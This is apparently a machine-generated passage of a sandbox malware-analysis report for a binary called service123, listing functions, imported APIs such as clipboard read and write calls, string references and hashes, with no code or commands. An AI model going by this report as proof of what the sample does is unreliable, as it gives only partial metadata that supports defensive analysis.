Instruction ID: 7d2edadcf21e6c76a291a92a2633d66bbde113d392dc9a06aa2d218c4ffc2137
Opcode Fuzzy Hash: 6c8c179285eb62613862f2139e5e1d494b14a5af78a071e9033ac637997f7d50
Instruction Fuzzy Hash: B021D5B5905716CFCB24DF68E98466DB7F1BB49300F11852ED94497320E738A916CF86

Function 6C9EB3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b973a2015033febde29d9ead3f92ae4bc56a773107110babf400389f362927
Instruction ID: 24a94023efa7244d77eac36cddfddf35637a59ebcd9ee6b1281a70be98b21fc7
Opcode Fuzzy Hash: 02b973a2015033febde29d9ead3f92ae4bc56a773107110babf400389f362927
Instruction Fuzzy Hash: A15149B5A093038FCB05DF5DE08055ABBF0FFA9358B55855DD8988BB10E730E846CBA6

Function 6C9EB560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff9acfdb6fb9d2b8690b773ba077cd4cbf1deb27584b417b5acfef8feef55c1
Instruction ID: 46191a789dd4b7671888c35b652dd8173ef1c6f078e976ff5b13f54cd50cb3cf
Opcode Fuzzy Hash: 4ff9acfdb6fb9d2b8690b773ba077cd4cbf1deb27584b417b5acfef8feef55c1
Instruction Fuzzy Hash: 443102B1B143028FDB059FADD4C02497BB5BFAA318B48826CDD508BB45EB30D406CB66

Non-executed Functions

Function 6C9DCD00 Relevance: 33.4, APIs: 22, Instructions: 445stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9DCD7D

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 5bca86b42b36b878a29d5fe875372d4ce7bee54060d1d82e544617ad6418b722
Instruction ID: 02163b37ba7d99cdb79213b91a8f5e6d01a22543381b37acb9503ec84cd15a84
Opcode Fuzzy Hash: 5bca86b42b36b878a29d5fe875372d4ce7bee54060d1d82e544617ad6418b722
Instruction Fuzzy Hash: 9E0208B2508B518FD700CF29C444395FBE2AF86318F1AC66ED8A867B91C376F549CB91

Function 6C9E0FC0 Relevance: 22.6, APIs: 8, Strings: 4, Instructions: 1647stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C9E0FCA
strlen.MSVCRT ref: 6C9E0FD4

Strings

inity, xrefs: 6C9E1E21
5, xrefs: 6C9E14D2
!, xrefs: 6C9E2C08
, xrefs: 6C9E240F

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: defafce96e8be55bddb1b916139ead4941aa370efc55488149a2c22cbc69b1a3
Instruction ID: ef5bd7bb57dbdaea7fc4ca2ec150ae16e3e483380aa3a530b77f9c185aca2f44
Opcode Fuzzy Hash: defafce96e8be55bddb1b916139ead4941aa370efc55488149a2c22cbc69b1a3
Instruction Fuzzy Hash: 4DF25771A08781CFD325CF69C48479ABBE0BFAA308F11892DE8D997751D775E844CB82

Function 6CA584D0 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

random_device::random_device(const std::string&): device not available, xrefs: 6CA58598
default, xrefs: 6CA584EF
Genu, xrefs: 6CA58557
random_device::random_device(const std::string&): unsupported token, xrefs: 6CA586D2
Auth, xrefs: 6CA5854F
rand_s, xrefs: 6CA586B7
Genu, xrefs: 6CA585DF
Auth, xrefs: 6CA58676
rdrand, xrefs: 6CA585A8
rdrnd, xrefs: 6CA58618
Genu, xrefs: 6CA5866E
hardware, xrefs: 6CA586A0
rdseed, xrefs: 6CA58518
Auth, xrefs: 6CA585E7

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
API String ID: 3108337309-1359127009
Opcode ID: a4b4412be2b7798ebb3d8e08ce1146ef34354f7516fcd30369a41278c6b3f42e
Instruction ID: d0987cbed4cde1b1cf0b34b8d1dced4a8f5008776899e848416e073d9f965399
Opcode Fuzzy Hash: a4b4412be2b7798ebb3d8e08ce1146ef34354f7516fcd30369a41278c6b3f42e
Instruction Fuzzy Hash: D74118F16683414BE300AA38C68235A76A6BB4031CFA8C93ED892D7F95E735D5F5C352

Function 6C9DEE50 Relevance: 12.5, APIs: 8, Instructions: 494COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C9DF18B
malloc.MSVCRT ref: 6C9DF1A8

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 729dc73fd91622bce3a721e7e451486e2e45d79a76b2ebf0eaacd2e9dec61a5d
Instruction ID: 2234a1af49f94443f7e1f6b89c6788a3b47e5531cbc74824203fbfa744f4d8fa
Opcode Fuzzy Hash: 729dc73fd91622bce3a721e7e451486e2e45d79a76b2ebf0eaacd2e9dec61a5d
Instruction Fuzzy Hash: 21125E75608B068FC700CF19C08165AF7E5BF98358F5ACA2DE899A7B50D730F949CB92

Function 6C9FE6E0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 219stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9FE70A
strlen.MSVCRT ref: 6C9FE77A

Strings

basic_string: construction from null is not valid, xrefs: 6C9FE742, 6C9FE7B2, 6C9FE822
basic_string: construction from null is not valid, xrefs: 6C9FE86F, 6C9FE8C0, 6C9FE910

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: 581c8aebe666810449fd15467cb676b8a1fb58bff82a738b099c1348e36f1298
Instruction ID: 562cbf3e7c17584221279060989e16af6585f7e847fa7f23b66c9c3e4f4394e6
Opcode Fuzzy Hash: 581c8aebe666810449fd15467cb676b8a1fb58bff82a738b099c1348e36f1298
Instruction Fuzzy Hash: 6861C5F1A057148FCB00BF2CD58449ABBE4BF59214F46496DE8849B315E331EC9ACBD2

Function 6C9E9D11 Relevance: 12.0, APIs: 8, Instructions: 46clipboardmemorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA739D0: strlen.MSVCRT ref: 6CA739DE

OpenClipboard.USER32 ref: 6C9E9D31
GlobalAlloc.KERNEL32 ref: 6C9E9D55
GlobalLock.KERNEL32 ref: 6C9E9D72
strcpy.MSVCRT ref: 6C9E9D82
GlobalUnlock.KERNEL32 ref: 6C9E9D8A
EmptyClipboard.USER32 ref: 6C9E9D93
SetClipboardData.USER32 ref: 6C9E9DA4
CloseClipboard.USER32 ref: 6C9E9DAD

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlockstrcpystrlen
String ID:
API String ID: 3344633682-0
Opcode ID: 563709046010efd92721653a03a1accbdf5c528a6e0e911d79893581b1841b68
Instruction ID: ce810fe8935fc358af48cb84595bb420ee47f424801ff8d77b9677363007acf2
Opcode Fuzzy Hash: 563709046010efd92721653a03a1accbdf5c528a6e0e911d79893581b1841b68
Instruction Fuzzy Hash: 6711F8B15043018BDB14BF78D6892AEBBF0BF25305F02492CE89683644EB74D449CB53

Function 6C9F0860 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9F0886
memcmp.MSVCRT ref: 6C9F08A9
memcmp.MSVCRT ref: 6C9F091F
memcmp.MSVCRT ref: 6C9F0991

Part of subcall function 6CA9ADB0: strlen.MSVCRT ref: 6CA9ADBE

memcmp.MSVCRT ref: 6C9F0A25

Strings

basic_string::compare, xrefs: 6C9F08C8, 6C9F093C, 6C9F09AF, 6C9F0A44, 6C9F0A60
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C9F08D0, 6C9F0944, 6C9F09B7, 6C9F0A4C, 6C9F0A68

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 817cf88b73f2b675225a3ab54b5a60c3aade6f15b48f462a60668803fc33c0f3
Instruction ID: 1182bf684ebd41b845612a71439ba5b265025ef1c37a0b587e58e1ba539634b0
Opcode Fuzzy Hash: 817cf88b73f2b675225a3ab54b5a60c3aade6f15b48f462a60668803fc33c0f3
Instruction Fuzzy Hash: E1616971A09310AFC3049F6EC9C045AFBE9AFD8784F55992DE88887720E331D885CB92

Function 6C9E70C0 Relevance: 9.6, APIs: 6, Instructions: 649COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C9E70C7
memset.MSVCRT ref: 6C9E7217

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: localeconvmemset
String ID:
API String ID: 2367598729-0
Opcode ID: 6b9e740974f955018c09c0f28191795e41a8df8b6a5ccb7d58208ba500e0813b
Instruction ID: 69bed7a81b7f1d3b01239c84725a701cd31eec249a6134f8bc46c60f1679a40f
Opcode Fuzzy Hash: 6b9e740974f955018c09c0f28191795e41a8df8b6a5ccb7d58208ba500e0813b
Instruction Fuzzy Hash: C94213716083418FD702CF29D48035ABBE6BFAD308F15896DE8948BB42D775E949CB93

Function 6C9E5880 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1506COMMON

Download Yara Rule

Strings

Infinity, xrefs: 6C9E5BE0
NaN, xrefs: 6C9E5B5F
, xrefs: 6C9E6D95
, xrefs: 6C9E7074

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: c2a278ddf9a769cad6925ae0fc76a11b4af8982db94659338a75a9ba2d47c331
Instruction ID: 7049529123e5cbb542c67f71b5369e187791ebfa3a187abe0146b0f544bf5f72
Opcode Fuzzy Hash: c2a278ddf9a769cad6925ae0fc76a11b4af8982db94659338a75a9ba2d47c331
Instruction Fuzzy Hash: 7EE240B1A093858FD712CF69C18074ABBF0BFA9748F14891EE99887751E775E844CF82

Function 6C9E9E27 Relevance: 6.0, APIs: 4, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32 ref: 6C9E9E37
GlobalLock.KERNEL32 ref: 6C9E9E49
GlobalUnlock.KERNEL32 ref: 6C9E9E6A
CloseClipboard.USER32 ref: 6C9E9E73
CloseClipboard.USER32 ref: 6C9E9E98

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: Clipboard$CloseGlobal$DataLockUnlock
String ID:
API String ID: 3186146249-0
Opcode ID: 0ad794a443e2d4f1e8e5efd2ff508ccda1cd61fddc528a6ef1b4172ec4ca0ae4
Instruction ID: 29c3cc92a68400b478a1a4aed662810782247f286117222224b28bd7f7e4b3c6
Opcode Fuzzy Hash: 0ad794a443e2d4f1e8e5efd2ff508ccda1cd61fddc528a6ef1b4172ec4ca0ae4
Instruction Fuzzy Hash: F1F0FBB26056028FEB057F7CA6481AEBBB4BF45214F064A2DD89696644DB30D44E8A93

Function 007951B0 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 007966C5
, xrefs: 007969A4

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: d09090feb873b70c97e7d564f8326fce78b071af03454932552c3c66f574e15c
Instruction ID: 6cede45349dd7355fa0dbcec1a4a846b5b419bd3a01c967166ca23d6df029c01
Opcode Fuzzy Hash: d09090feb873b70c97e7d564f8326fce78b071af03454932552c3c66f574e15c
Instruction Fuzzy Hash: 0EE232B1A08741CFDB21DF29D18471ABBE0BF88754F148A1DE89997361E779E844CF82

Function 00793E20 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

., xrefs: 00794114
gfff, xrefs: 00793F2C
gfff, xrefs: 00793F43
@, xrefs: 00793FD9

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction ID: 3fa3111be3fb76caed66ca4ff91802fd50b37cba6e40b12239f045582b954d17
Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction Fuzzy Hash: 10D1C371A083058BCF14DF29E48471BBBE2BF94344F18C92DE9589B346E778DD468792

Function 6C9E44F0 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

@, xrefs: 6C9E46A9
gfff, xrefs: 6C9E4613
., xrefs: 6C9E47E4
gfff, xrefs: 6C9E45FC

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction ID: 2079c35d9370758744d55b3336c40fd302947511c55c97a1a03d90c1691f122b
Opcode Fuzzy Hash: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction Fuzzy Hash: 12D1F471A087068BD701CF69C48435BB7E6AFE9748F18C92DE8949BB45D774D908CF82

Function 6CA73140 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 6CA73250

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: 167305ebb21aa05ca79e76e49a09e4246062bfc3caf0410a320044d45f2574ac
Instruction ID: c6a6b91ce3354308cb525f4dc56175d126d5497ccbbd1f1495df4d81b78b95c8
Opcode Fuzzy Hash: 167305ebb21aa05ca79e76e49a09e4246062bfc3caf0410a320044d45f2574ac
Instruction Fuzzy Hash: 82415DB690A2108FC714DF69D58065AFBE0FF99314F19C96EE8988B305D330D885CBE2

Function 6CA70730 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6CA707A0
memset.MSVCRT ref: 6CA707C4

Strings

basic_string::_M_replace_aux, xrefs: 6CA70840

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: 7e67177b66735db7bfb8174e361137fb479d9c4396fa92833510efb3c0025ea9
Instruction ID: bca8cf2e623443b5f5034e39c29e033624ce0984804af4d3ae09096bef875f65
Opcode Fuzzy Hash: 7e67177b66735db7bfb8174e361137fb479d9c4396fa92833510efb3c0025ea9
Instruction Fuzzy Hash: 53317EB9609A908FC3119F2CC48065BBFF1BFC6604F19856DE8A48B705D636C884CFA2

Function 6CA43840 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6CA43898
memcpy.MSVCRT ref: 6CA43911

Part of subcall function 6CA45590: memcpy.MSVCRT ref: 6CA45620

Strings

basic_string::_M_replace_aux, xrefs: 6CA438C0

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

